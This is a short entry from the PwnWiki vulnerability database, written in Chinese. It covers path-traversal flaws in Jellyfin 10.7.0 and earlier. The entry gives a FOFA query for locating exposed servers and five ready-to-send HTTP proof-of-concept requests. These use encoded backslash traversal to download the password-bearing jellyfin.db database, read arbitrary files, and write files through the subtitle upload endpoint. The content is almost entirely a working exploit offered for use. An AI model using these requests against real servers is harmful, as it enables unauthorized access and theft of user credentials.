PWNWIK.COM==免费、自由、人人可编辑的漏洞库
,
影响版本
jellyfin<=10.7.0
FOFA
title="Jellyfin"
POC1
从服务器下载带有密码的jellyfin.db
GET /Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/ HTTP/1.1 Host: x.x.x.x accept: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Referer: http://x.x.x.x/web/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close
POC2
GET /Videos/anything/hls/m/..%5Cdata%5Cjellyfin.db HTTP/1.1
POC3
GET /Videos/anything/hls/..%5Cdata%5Cjellyfin.db/stream.m3u8/?api_key=4c5750626da14b0a804977b09bf3d8f7 HTTP/1.1
POC4
要下载的POC c:tempfilename.jpg
GET /Images/Ratings/c:%5ctemp/filename HTTP/1.1 GET /Images/Ratings/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5ctemp/filename HTTP/1.1
POC5
POST /Videos/d7634eb0064cce760f3f0bf8282c16cd/Subtitles HTTP/1.1 ... X-Emby-Authorization: MediaBrowser DeviceId="...", Version="10.7.0", Token="..." ... {"language":".\..\","format":".\..\test.bin","isForced":false,"data":"base64 encoded data"}
免费、自由、人人(PwnWiki.Com)可编辑的漏洞库